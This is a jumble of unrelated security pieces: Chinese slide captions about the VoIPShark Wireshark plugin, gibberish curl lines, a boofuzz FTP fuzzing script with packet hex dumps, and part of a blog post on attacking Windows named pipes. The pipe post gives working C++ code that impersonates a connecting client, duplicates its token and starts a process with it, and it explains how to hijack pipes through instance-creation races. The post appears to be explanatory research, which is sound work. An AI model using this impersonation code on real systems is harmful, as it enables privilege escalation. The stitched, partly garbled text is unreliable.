从前⼀一解析器器获取数据,处理理对应部分后,传递给下⼀一解析器器 解析流程图示例例 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1解析链中的钩⼦子 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1总体架构 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1解密流程 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 插件地址 •  位置:1Help1>1About1Wireshark1>1Folders1 / /Windows////////////////////////////////////////////////////////////////////////////////////Ubuntu1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解密SRTP:1SRTP数据包 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解密SRTP:1开启⾃自动解密 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解密SRTP:1解密后的SRTP1(RTP)1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1导出通话⾳音频 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 导出通话⾳音频: 指定位置和⽂文件名 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 导出通话⾳音频: 导出流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1SIP信息收集 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1DTMF1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1扩展 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1RTP数据包传送 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1SIP认证导出 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1服务器器和代理理 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP信息收集:1消息 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1VoIP攻击检测 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 1VoIP攻击检测:1暴暴⼒力力破解 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 1VoIP攻击检测:1Invite泛洪攻击 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 1VoIP攻击检测:1报⽂文泛洪 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 1VoIP攻击检测:1中间⼈人攻击 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 1VoIP攻击检测:1未认证⽤用户 PentesterAcademy.co m/ ©PentesterAcademy.com 演示 PentesterAcademy.co m/ ©PentesterAcademy.com 提问环节 1 Github:1github.com/pentesteracademy/voipshark1 nishant@attackdefense.com1
@jtpereyda curl 'fj48914309qr2p3 rim e/resd,fa;wf.,4vpl6v3/5p.vl;ul.6.ty[5p16[4[1]4\5][13]5123' curl 'fj48914309qr2p3 rim e/resd,fa;wf.,4vpl6v3/5p.vl;ul.6.ty[5p16[4[1]4\5][13]5123' https://apps.dtic.mil/dtic/tr/fulltext/u2/a558209.pdf https://community.synopsys.com/s/question/0D53400004D2fALCAZ from boofuzz import * # ... session = Session( target=Target( connection=SocketConnection(target_host, target_port, proto='tcp'), ) ) s_initialize("user") s_string("USER") s_delim(" ") s_string('ascii') s_static("\r\n") s_initialize("pass") s_string("PASS") s_delim(" ") s_string('ascii') s_static("\r\n") s_initialize("stor") s_string("STOR") s_delim(" ") s_string("AAAA") s_static("\r\n") s_initialize("retr") s_string("RETR") s_delim(" ") s_string("AAAA") s_static("\r\n") session.connect(s_get("user")) session.connect(s_get("user"), s_get("pass")) session.connect(s_get("pass"), s_get("stor")) session.connect(s_get("pass"), s_get("retr")) 0000 00 04 00 01 00 06 00 00 17 00 e4 88 00 00 08 00 0010 45 00 00 60 e6 c3 40 00 40 06 3d c5 0a 00 01 05 0020 0a 00 01 0b d6 df 08 01 94 68 ae 69 f4 2f b6 0e 0030 80 18 00 d2 16 62 00 00 01 01 08 0a 00 0f 48 a9 0040 1c 62 1b a3 80 00 00 28 d1 82 5e 7d 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 03 00 00 00 00 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 04 00 01 00 06 00 00 17 00 2a ed 00 00 08 00 0010 45 00 00 60 13 c7 40 00 40 06 12 af 0a 00 00 11 0020 0a 00 00 12 03 1f 08 01 ff 30 1f 56 86 fd 15 cb 0030 80 18 00 d2 14 75 00 00 01 01 08 0a 07 f3 0c 90 0040 07 f1 8c fd 80 00 00 28 5c 1c ef 1b 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 04 00 00 00 00 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 04 00 01 00 06 00 00 17 00 e4 88 00 00 08 00 0010 45 00 00 60 e6 c3 40 00 40 06 3d c5 0a 00 01 05 0020 0a 00 01 0b d6 df 08 01 94 68 ae 69 f4 2f b6 0e 0030 80 18 00 d2 16 62 00 00 01 01 08 0a 00 0f 48 a9 0040 1c 62 1b a3 80 00 00 28 d1 82 5e 7d 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 03 00 00 00 00 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 01 00 06 00 00 17 00 97 11 00 00 08 00 0010 45 00 00 50 ad ae 40 00 40 06 76 ea 0a 00 01 0b 0020 0a 00 01 05 08 01 d6 df f4 2f b6 0e 94 68 ae 95 0030 80 18 00 d2 62 c3 00 00 01 01 08 0a 1c 62 1b a3 0040 00 0f 48 a9 80 00 00 18 d1 82 5e 7d 00 00 00 01 0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 01 00 06 00 00 17 00 97 11 00 00 08 00 0010 45 00 00 50 ad ae 40 00 40 06 76 ea 0a 00 01 0b 0020 0a 00 01 05 08 01 d6 df f4 2f b6 0e 94 68 ae 95 0030 80 18 00 d2 62 c3 00 00 01 01 08 0a 1c 62 1b a3 0040 00 0f 48 a9 80 00 00 18 d1 82 5e 7d 00 00 00 01 0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 01 00 06 00 00 17 00 b1 07 00 00 08 00 0010 45 00 00 50 99 37 40 00 40 06 8d 4e 0a 00 00 12 0020 0a 00 00 11 08 01 03 1f 86 fd 15 cb ff 30 1f 82 0030 80 18 00 d2 26 46 00 00 01 01 08 0a 07 f1 8c fd 0040 07 f3 0c 90 80 00 00 18 5c 1c ef 1b 00 00 00 01 0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 01 00 06 00 00 17 00 b1 07 00 00 08 00 0010 45 00 00 50 99 37 40 00 40 06 8d 4e 0a 00 00 12 0020 0a 00 00 11 08 01 03 1f 86 fd 15 cb ff 30 1f 82 0030 80 18 00 d2 26 46 00 00 01 01 08 0a 07 f1 8c fd 0040 07 f3 0c 90 80 00 00 18 5c 1c ef 1b 00 00 00 01 0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 session = Session( target=Target( connection=SerialConnection(port=1, baudrate=9600), ), sleep_time=sleep_between_cases, )
Offensive Windows IPC Internals 1: Named Pipes Contents: Introduction Named Pipe Messaging Data Transfer Modes Overlapping Pipe I/O, Blocking mode & In-/Out Buffers Named Pipe Security Impersonation Impersonating a Named Pipe Client Attack Surface Client Impersonation Attack scenario Prerequisites Misleading Documentation Implementation Instance Creation Race Condition Attack scenario Prerequisites Implementation Instance Creation Special Flavors Unanswered Pipe Connections Killing Pipe Servers PeekNamedPipe Prerequisites Implementation References The Series: Part 2 Introduction This post marks the start of a series of posts about the internals and interesting bits of various Windows based Inter-Process-Communication (IPC) technology components. Initially this series will cover the following topics: Named Pipes LPC ALPC RPC A few IPC technology components are therefore left out, but I might append this series sometime and include for example some of these: Window Messages DDE (which is based on Window Messages) Windows Sockets Mail Slots Alright so let’s get down to it with Named Pipes… Although the name might sound a bit odd pipes are a very basic and simple technology to enable communication and share data between two processes, where the term pipe simply describes a section of shared memory used by these two processes. To term this correctly right from the beginning, the IPC technology we’re speaking about is called ‘pipes’ and there are two types of pipes: Named Pipes Anonymous Pipes Most of the time when speaking about pipes you’re likely referring to Named Pipes as these offer the full feature set, where anonymous pipes are mostly used for child-parent communications. This also implies: Pipe communication can be between two processes on the same system (with named and anonymous pipes), but can also be made across machine boundaries (only named pipes can talk across machine boundaries). As Named Pipes are most relevant and support the full feature set, this post will focus only on Named Pipes. To add some historical background for Named Pipes: Named Pipes originated from the OS/2 times. It’s hart to pin down the exact release date named pipes were introduced to Windows, but at least it can be said that it must have been supported in Windows 3.1 in 1992 - as this support is stated in the Windows/DOS Developer’s Journal Volume 4, so it’s fair to assume named pipes have been added to Windows in the early 1990’s. Before we dive into the Named Pipe internals, please take note that a few code snippets will follow that are taken from my public Named Pipe Sample Implementation. Whenever you feel you want some more context around the snippets head over to the code repo and review the bigger picture. Named Pipe Messaging Alright so let’s break things down to get a hold of Named Pipe internals. When you’ve never heard of Named Pipes before imaging this communication technology like a real, steel pipe - you got a hollow bar with two ends and if you shout something into one end a listener will hear your words on the other end. That’s all a Named Pipe does, it transports information from one end to another. If you’re a Unix user you sure have used pipes before (as this is not a pure Windows technology) with something like this: cat file.txt | wc -l . A command that outputs the contents of file.txt , but instead of displaying the output to STDOUT (which could be your terminal window) the output is redirected (“piped”) to the input of your second command wc -l , which thereby counts the lines of your file. That’s an example of an anonymous pipe. A Windows based Named Pipe is as easily understood as the above example. To enable us to use the full feature set of pipes, we’ll move away from Anonymous Pipes and create a Server and a Client that talk to each other. A Named Pipe simply is an Object, more specifically a FILE_OBJECT, that is managed by a special file system, the Named Pipe File System (NPFS): When you create a Named Pipe, let’s say we call it ‘fpipe’, under the hood you’re creating a FILE_OBJECT with your given name of ‘fpipe’ (hence: named pipe) on a special device drive called ‘pipe’. Let’s wrap that into a something practical. A named pipe is created by calling the WinAPI function CreateNamedPipe, such as with the below [Source]: For now the most interesting part of this call is the \\\\.\\pipe\\fpipe . C++ requires escaping of slashes, so language independent this is equal to \\.\pipe\fpipe . The leading ‘.’ refers to your machines global root directory, where the term ‘pipe’ is a symbolic link to the NamedPipe Device. HANDLE serverPipe = CreateNamedPipe(   L"\\\\.\\pipe\\fpipe", // name of our pipe, must be in the form of \\.\pipe\<NAME>   PIPE_ACCESS_DUPLEX, // open mode, specifying a duplex pipe so server and client can send and receive data   PIPE_TYPE_MESSAGE, // MESSAGE mode to send/receive messages in discrete units (instead of a byte stream)   1, // number of instanced for this pipe, 1 is enough for our use case   2048, // output buffer size   2048, // input buffer size   0, // default timeout value, equal to 50 milliseconds   NULL // use default security attributes ); Since a Named Pipe Object is a FILE_OBJECT, accessing the named pipe we just created is equal to accessing a “normal” file. Therefore connecting to a named pipe from a client is therefore as easy as calling CreateFile [Source]: Once connected reading from a pipe just needs a call to ReadFile [Source]: Before you can read some data off a pipe, you want your server to write some data to it (which you can read.). That is done by calling - who would have guessed it - WriteFile [Source]: But what actually happens when you “write” to a pipe? Once a client connects to your server pipe, the pipe that you created is no longer in a listening state and data can be written to it. The user land call to WriteFile is dispatched to kernel land, where NtWriteFile is called, which determines all the bits and pieces about the Write-Operation, e.g. which device object is associated with the given file, whether or not the Write-Operation should be made synchronous (see section Overlapping Pipe I/O, Blocking mode & In-/Out Buffers), the I/O Request Packet (IRP) is set up and eventually NtWriteFile takes care that your data is written to the file. In our case the specified data is not written to an actual file on disk, but to a shared memory section that is referenced by the file handle return from CreateNamedPipe . Finally - as mentioned in the introduction - Named Pipes can also be used over a network connection across system boundaries. There are no additional implementations needed to call a remote Named Pipe server, just make sure that your call to CreateFile specifies an IP or hostname (as with the example above). Let’s make a guess: What network protocol will be used when calling a remote pipe server? …. drum rolls … absolutely unsurprising it is SMB. An SMB connection is made to the remote server, which is by default initialized by a negotiation request to determine the network authentication protocol. Unlike with other IPC mechanisms, such as with RPC, you as a server developer can not control the network authentication protocol as this is always negotiated through SMB. Since Kerberos is the preferred authentication scheme since Windows 2000, Kerberos will be negotiated if possible. HANDLE hPipeFile = CreateFile(L"\\\\\\pipe\\fpipe", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); ReadFile(hPipeFile, pReadBuf, MESSAGE_SIZE, pdwBytesRead, NULL); WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL); Note: From a client perspective you can effectively choose the authentication protocol by choosing to connect to a hostname or to an IP. Due to the design of Kerberos it cannot handle IPs very well and as such if you choose to connect to an IP address the result of the negotiation will always be NTLM(v2). Whereas when you connect to a hostname you will most likely always end up using Kerberos. Once the authentication is settled, the actions that client and server want to perform are once again just classic file actions, that are handled by SMB just as any other file operation, e.g. by starting a ‘Create Request File’ request as shown below: Data Transfer Modes Named pipes offer two basic communication modes: byte mode and message mode. In byte mode, messages travel as a continuous stream of bytes between the client and the server. This means that a client application and a server application do not know precisely how many bytes are being read from or written to a pipe at any given moment. Therefore a write on one side will not always result in a same-size read on the other. This allows a client and a server to transfer data without caring about the size of the data. In message mode, the client and the server send and receive data in discrete units. Every time a message is sent on the pipe, it must be read as a complete message. If you read from a server pipe in message mode, but your read buffer is too small to hold all of the data then the portion of data that fits in your buffer will be copied over to it, the remaining data stays in the server’s shared memory section and you’ll get an error 234 (0xEA, ERROR_MORE_DATA) to indicate that there is more data to fetch. A visual comparison of the messages modes is shown below, taken from “Network programming for Microsoft Windows” (1999): Overlapping Pipe I/O, Blocking mode & In-/Out Buffers Overlapping I/O, Blocking mode and In-/Out Buffers are not amazingly important from a security standpoint, but being aware that these exists and what they mean can aid understanding, communication, building and debugging named pipes. Therefore I will add these concepts here briefly. Overlapping I/O Several Named Pipe related functions, such as ReadFile, WriteFile, TransactNamedPipe, and ConnectNamedPipe can perform pipe operations either synchronous, meaning the executing thread is waiting for the operation to complete before continuing, or asynchronous, meaning the executing thread fires the action and continues without waiting for its completion. It’s important to note that asynchronous pipe operations can only be made on a pipe (server) that allows overlapped I/O by setting the FILE_FLAG_OVERLAPPED within the CreateNamedPipe call. Asynchronous calls can be made either by specifying an OVERLAPPED structure as the last parameter to each of the above mentioned ‘standard’ pipe actions. such as ReadFile, or by specifying a COMPLETION_ROUTINE as the last parameter to the ‘extended’ pipe actions, such as ReadFileEx. The former, OVERLAPPED structure, method is event based, meaning an event object must be created and is signaled once the operation is completed, while the COMPLETION_ROUTINE method is callback based, meaning a callback routine is passed to the executing thread, which is queued and executed once signaled. More details on this can be found here with a sample implementation by Microsoft here. Blocking mode The blocking mode behavior is defined when setting up a named pipe server with CreateNamedPipe by using (or omitting) a flag in the dwPipeMode parameter. The following two dwPipeMode flags define the blocking mode of the server: PIPE_WAIT (default): Blocking mode enabled. When using named pipe operations, such as ReadFile on a pipe that enabled blocking mode the operation waits for completion. Meaning that a read operation on such a pipe would wait until there is data to read, a write operation would wait until all data is written. This can of course cause an operation to wait indefinitely in some situations. PIPE_NOWAIT: Blocking mode disabled. Named pipe operations, such as ReadFile, return immediately. You need routines, such as Overlapping I/O, to ensure all data is read or written. In-/Out Buffers By In-/Out Buffers I’m referring to the input and output buffers of the named pipe server that you create when calling CreateNamedPipe and more precisely to the sizes of these buffers in the nInBufferSize and nOutBufferSize parameters. When performing read and write operations your named pipe server uses non-paged memory (meaning physical memory) to temporarily store data which is to be read or written. An attacker who is allowed to influence these values for a created server can abuse these to potentially cause a system crash by choosing large buffers or to delay pipe operations by choosing a small buffer (e.g. 0): Large buffers: As the In-/Out Buffers are non-paged the server will run out of memory if they are chosen too big. However, the nInBufferSize and nOutBufferSize parameters are not ‘blindly’ accepted by the system. The upper limit is defined by a system depended constant; I couldn’t find super accurate information about this constant (and didn’t dig through the headers); This post indicates that it’s ~4GB for an x64 Windows7 system. Small buffers: A buffer size of 0 is absolutely valid for nInBufferSize and nOutBufferSize. If the system would strictly enforce what it’s been told you wouldn’t be able to write anything to your pipe, cause a buffer of size 0 is … well, a not existing buffer. Gladly the system is smart enough to understand that you’re asking for a minimum buffer and will therefore expand the actual buffer allocated to the size it receives, but that comes with a consequence to performance. A buffer size of 0 means every byte must be read by the process on the other side of the pipe (and thereby clearing the buffer) before new data can be written to the buffer. This is true for both, the nInBufferSize and nOutBufferSize. A buffer of size 0 could thereby cause server delays. Named Pipe Security Once again we can make this chapter about how to set and control the security of a named pipe rather short, but it’s important to be aware how this is done. The only gear you can turn when you want to secure your named pipe setup is setting a Security Descriptor for the named pipe server as the last parameter (lpSecurityAttributes) to the CreateNamedPipe call. If you want some background on what a Security Descriptor is, how it’s used and how it could look like you’ll find the answers in my post A Windows Authorization Guide. Setting this Security Descriptor is optional; A default Security Descriptor can be be set by specifying NULL to the lpSecurityAttributes parameter. The Windows docs define what the default Security Descriptor does for your named pipe server: The ACLs in the default security descriptor for a named pipe grant full control to the LocalSystem account, administrators, and the creator owner. They also grant read access to members of the Everyone group and the anonymous account. Source: CreateNamedPipe > Paremter > lpSecurityAttributes SECURITY_IMPERSONATION_LEVEL Description SecurityAnonymous The server cannot impersonate or identify the client. SecurityIdentification The server can get the identity and privileges of the client, but cannot impersonate the client. SecurityImpersonation The server can impersonate the client’s security context on the local system. So by default Everyone can read from your named pipe server if you don’t specify a Security Descriptor, regardless if the reading client is on the same machine or not. If you connect to a named pipe server without a Security Descriptor set but still get an Access Denied Error (error code: 5) be sure you’ve only specified READ access (note that the example above specifies READ and WRITE access with GENERIC_READ | GENERIC_WRITE ). For remote connections, note once again - as described at the end of the Named Pipe Messaging chapter - that the network authentication protocol is negotiated between the client and server through the SMB protocol. There is no way to programmatically enforce the use of the stronger Kerberos protocol (you only could disable NTLM on the server host). Impersonation Impersonation is a simple concept that we’ll need in the following section to talk about attack vectors with named pipes. If you’re familiar with Impersonation feel free to skip this section; Impersonation is not specific to Named Pipes. If you’re not yet came across Impersonation in a Windows environment, let me summarize this concept quickly for you: Impersonation is the ability of a thread to execute in a security context different from the security context of the process that owns the thread. Impersonation typically applies in a Client- Server architecture where a client connects to the server and the server could (if needed) impersonate the client. Impersonation enables the server (thread) to perform actions on behalf of the client, but within the limits of the client’s access rights. A typical scenario would be a server that wants the access some records (say in database), but only the client is allowed to access its own records. The server could now reply back to the client, asking to fetch the records itself and send these over to the server, or the server could use an authorization protocol to prove the client allowed the server to access the record, or - and this is what Impersonation is - the client sends the server some identification information and allows the server to switch into the role of the client. Somewhat like the client giving its driver license to the server along with the permission to use that license to identify towards other parties, such as a gatekeeper (or more technically a database server). The identification information, such as the information specifying who the client is (such as the SID) are packed in a structure called a security context. This structure is baked deeply into the internals of the operating system and is a required piece of information for inter process communication. Due to that the client can’t make an IPC call without a security context, but it needs a way to specify what it allows the server to know about and do with its identity. To control that Microsoft created so called Impersonation Levels. The SECURITY_IMPERSONATION_LEVEL enumeration structure defines four Impersonation Levels that determine the operations a server can perform in the client’s context. SECURITY_IMPERSONATION_LEVEL Description SecurityDelegation The server can impersonate the client’s security context on remote systems. For more background information on Impersonation have a read through Microsoft’s docs for Client Impersonation. For some context around Impersonation have a look at the Access Tokens and the following Impersonation section in my post about Windows Authorization. Impersonating a Named Pipe Client Okay, so while we’re on the topic and in case you’re not totally bored yet. Let’s have a quick run down of what actually happens under the hood if a server impersonated a client. If you’re more interested in how to implement this, you’ll find the answer in my sample implementation here. Step 1: The server waits for an incoming connection from a client and afterwards calls the ImpersonateNamedPipeClient function. Step 2: This call results in a call to NtCreateEvent (to create a callback event) and to NtFsControlFile, which is the function executing the impersonation. Step 3: NtFsControlFile is a general purpose function where its action is specified by an argument, which in this case is FSCTL_PIPE_Impersonate. The below is based on the open source code of ReactOS, but i think it’s fair to assume the Windows Kernel Team implemented it in a similar way. Step 4: Further down the call stack NpCommonFileSystemControl is called where FSCTL_PIPE_IMPERSONATE is passed as an argument and used in a switch-case instruction to determine what to do. Step 5: NpCommonFileSystemControl calls NbAcquireExeclusiveVcb to lock an object and NpImpersonate is called given the server’s pipe object and the IRP (I/O Request Object) issued by the client. Step 6: NpImpersonate then in turn calls SeImpersonateClientEx with the client’s security context, which has been obtained from the client’s IRP, as a parameter. Step 7: SeImpersonateClientEx in turn calls PsImpersonateClient with the server’s thread object and the client’s security token, which is extracted from the client’s security context Step 8: The server’s thread context is then changed to the client’s security context. Step 9: Any action the server takes and any function the server calls while in the security context of the client are made with the identify of the client and thereby impersonating the client. Step 10: If the server is done with what it intended to do while being the client, the server calls RevertToSelf to switch back to its own, original thread context. Attack Surface Client Impersonation Sooo finally we’re talking about attack surface. The most important attack vector based on named pipes is Impersonation. Luckily we’ve introduced and understood the concept of Impersonation already in the above section, so we can dive right in. Attack scenario Impersonation with named pipes can best be abused when you got a service, program or routine that allows you to specify or control to access a file (doesn’t matter if it allows you READ or WRITE access or both). Due to the fact that Named Pipes are basically FILE_OBJECTs and operate on the same access functions as regular files (ReadFile, WriteFile, CreateFile, …) you can specify a named pipe instead of a regular file name and make your victim process connect to a named pipe under your control. Prerequisites There are two important aspects you need to check when attempting to impersonate a client. The first is to check how the client implements the file access, more specifically does the client specify the SECURITY_SQOS_PRESENT flag when calling CreateFile ? A vulnerable call to CreateFile looks like this: Whereas a safe call to CreateFile like this: By default a call without explicitly specifying the SECURITY_IMPERSONATION_LEVEL (as with the later example above) is made with the Impersonation Level of SecurityAnonymous. If the SECURITY_SQOS_PRESENT flag is set without any additional Impersonation Level (IL) or with an IL set to SECURITY_IDENTIFICATION or SECURITY_ANONYMOUS you cannot impersonate the client. The second important aspect to check is the file name, aka. the lpFileName parameter, given to CreateFile. There is an important distinction between calling local named pipes or calling remote named pipes. A call to a local named pipe is defined by the file location \\.\pipe\<SomeName> . Calls to local pipes can only be impersonated when the SECURITY_SQOS_PRESENT flag is explicitly set with an Impersonation Level above SECURITY_IDENTIFICATION. Therefore a vulnerable call looks like this: To be clear. A safe call to a local pipe would look like this: This later call is safe even without the SECURITY_SQOS_PRESENT, because a local pipe is called. hFile = CreateFile(pipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL); // calling with explicit SECURITY_IMPERSONATION_LEVEL hFile = CreateFile(pipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION , NULL); // calling without explicit SECURITY_IMPERSONATION_LEVEL hFile = CreateFile(pipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT, NULL); hFile = CreateFile(L"\\.\pipe\fpipe", GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_IMPERSONATION, NULL); hFile = CreateFile(L"\\.\pipe\fpipe", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL); A remote named pipe on the other hand is defined by a lpFileName beginning with a hostname or an IP, such as: \\ServerA.domain.local\pipe\<SomeName> . Now comes the important bit: When the SECURITY_SQOS_PRESENT flag is not present and a remote named pipe is called the impersonation level is defined by the user privileges running the name pipe server. That means that when you call a remote named pipe without the SECURITY_SQOS_PRESENT flag, your attacker user that runs the pipe must hold the SeImpersonatePrivilege (SE_IMPERSONATE_NAME) in order to impersonate the client. If your user does not hold this privilege the Impersonation Level will be set to SecurityIdentification (which allows you to identify, but not impersonate the user). But that also means that if your user holds the SeEnableDelegationPrivilege (SE_ENABLE_DELEGATION_NAME), the Impersonation Level is set to SecurityDelegation and you can even authenticate the victim user against other network services. An important take away here is: You can make a remote pipe call to a named pipe running on the same machine by specifying \\\pipe\<SomeName> To finally bring the pieces together: If the SECURITY_SQOS_PRESENT is not set you can impersonate a client if you have a user with at least SE_IMPERSONATE_NAME privileges, but for named pipes running on the same machine you need to call them via \\\pipe\... If the SECURITY_SQOS_PRESENT is set you can only impersonate a client if an Impersonation Level above SECURITY_IDENTIFICATION is set along with it (regardless if you call a named pipe locally or remote). Misleading Documentation Microsoft’s documentation about Impersonation Levels (Authorization) states the following: When the named pipe, RPC, or DDE connection is remote, the flags passed to CreateFile to set the impersonation level are ignored. In this case, the impersonation level of the client is determined by the impersonation levels enabled by the server, which is set by a flag on the server’s account in the directory service. For example, if the server is enabled for delegation, the client’s impersonation level will also be set to delegation even if the flags passed to CreateFile specify the identification impersonation level. Source: Windows Docs: Impersonation Levels (Authorization) Be aware here that this is technically true, but it’s somewhat misleading… The accurate version is: When calling a remote named pipe and you only specify Impersonation Level flags (and nothing else) to CreateFile then these will be ignore, but if you specify Impersonation Flags alongside with the SECURITY_SQOS_PRESENT flag, then these will be respected. Examples: Implementation You can find an a full implementation in my sample code here. A quick run down of the implementation is shown below: // In the below call the SECURITY_IDENTIFICATION flag will be respected by the remote server hFile = CreateFile(L"\\ServerA.domain.local", GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, NULL); /* --> The server will obtain a SECURITY_IDENTIFICATION token */ // In this call the SECURITY_IDENTIFICATION flag will be ignored hFile = CreateFile(L"\\ServerA.domain.local", GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_IDENTIFICATION, NULL); /* --> The server will obtain a token based on the privileges of the user running the server.       A user holding SeImpersonatePrivilege will get an SECURITY_IMPERSONATION token */ // In this call the Impersonation Level will default to SECURITY_ANONYMOUS and will be respected hFile = CreateFile(L"\\ServerA.domain.local", GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT, NULL); /* --> The server will obtain a SECURITY_ANONYMOUS token. A call to OpenThreadToken will result in error 1347 (0x543, ERROR_CANT_OPEN_ANONYMOUS)*/ // Create a server named pipe serverPipe = CreateNamedPipe(   pipeName,           // name of our pipe, must be in the form of \\.\pipe\ <NAME>   PIPE_ACCESS_DUPLEX, // The rest of the parameters don't really matter   PIPE_TYPE_MESSAGE, // as all you want is impersonate the client...   1, //   2048, //   2048, //   0, //   NULL // This should ne NULL so every client can connect ); // wait for pipe connections BOOL bPipeConnected = ConnectNamedPipe(serverPipe, NULL); // Impersonate client BOOL bImpersonated = ImpersonateNamedPipeClient(serverPipe); // if successful open Thread token - your current thread token is now the client's token BOOL bSuccess = OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken); // now you got the client token saved in hToken and you can safeyl revert back to self bSuccess = RevertToSelf(); // Now duplicate the client's token to get a Primary token bSuccess = DuplicateTokenEx(hToken,   TOKEN_ALL_ACCESS,   NULL,   SecurityImpersonation, The result can be seen below: There are some catches when you implement this on your own: When you create a process with CreateProcessWithTokenW, you need to RevertToSelf before calling CreateProcessWithTokenW otherwise you’ll receive an error. When you want to create a window based process (something with a window that pops up, such as calc.exe or cmd.exe) you need to grant the client access to your Window and Desktop. A sample implementation allowing all users to access to your Window and Desktop can be found here. Instance Creation Race Condition Named Pipes instances are created and live within a global ‘namespace’ (actually technically there is no namespace, but this aids understanding that all named pipes live under to same roof) within the Name Pipe File System (NPFS) device drive. Moreover multiple named pipes with the same name can exist under this one roof. So what happens if an application creates a named pipe that already exists? Well if you don’t set the right flags nothing happens, meaning you won’t get an error and even worse you won’t get client connections, due to the fact that Named Pipe instances are organized in a FIFO (First In First Out) stack. This design makes Named Pipes vulnerable for instance creation race condition vulnerabilities. Attack scenario The attack scenario to exploit such a race condition is as follows: You’ve identified a service, program or routine that creates a named pipe that is used by client applications running in a different security context (let’s say they run under the NT Service user). The server creates a named pipe for communication with the client application(s). Once in a while a client connects to the server’s named pipe - it wouldn’t be uncommon if the server application triggers the clients to connect after the server pipe is created. You figure out when and how the server is started and the name of the pipe it creates. Now you’re writing a program that creates a named pipe with the same name in a scenario where your named pipe instance is created before the target server’s named pipe. If the server’s named pipe is created insecurely it will not notice that a named pipe with the same name already exist   TokenPrimary,   &hDuppedToken ); // If that succeeds you got a Primary token as hDuppedToken and you can create a proccess with that token CreateProcessWithTokenW(hDuppedToken, LOGON_WITH_PROFILE, command, NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); and will trigger the clients to connect. Due to the FIFO stack the clients will connect to you and you can read or write their data or try to impersonate the clients. Prerequisites For this attack to work you need a target server that doesn’t check if a named pipe with the same name already exists. Usually a server doesn’t have extra code to check manually if a pipe with the same name already exists - thinking about it you would expect to get an error if your pipe name already exists right? But that doesn’t happen because two named pipe instances with the same name are absolutely valid … for whatever reason. But to counter this attack Microsoft has added the FILE_FLAG_FIRST_PIPE_INSTANCE flag that can be specified when creating your named pipe through CreateNamedPipe. When this flag is set your create call will return an INVALID_HANDLE_VALUE, which will cause an error in a subsequent call to ConnectNamedPipe. If you’re target server does not specify the FILE_FLAG_FIRST_PIPE_INSTANCE flag it is likely vulnerable, however there is one additional thing you need to be aware of on the attacker side. When creating a named pipe through CreateNamedPipe there is a nMaxInstances parameter, which specifies…: The maximum number of instances that can be created for this pipe. The first instance of the pipe can specify this value; Source: CreateNamedPipe So if you set this to ‘1’ (as in the sample code above) you kill your own attack vector. To exploit an instance creation race condition vulnerability set this to PIPE_UNLIMITED_INSTANCES. Implementation All you need to do for exploitation is create a named pipe instance with the right name at the right time. My sample implementation here can be used as an implementation template. Throw this in you favorite IDE, set in your pipe name, ensure your named pipe is created with the PIPE_UNLIMITED_INSTANCES flag and fire away. Instance Creation Special Flavors Unanswered Pipe Connections Unanswered pipe connections are those connection attempts issued by clients that - who would have guessed it - are not successful, hence unanswered, because the pipe that is requested by the client is not existing. The exploit potential here is quite clear and simple: If a client wants to connect to a pipe that’s not existing, we create a pipe that the client can connect to and attempt to manipulate the client with malicious communication or impersonate 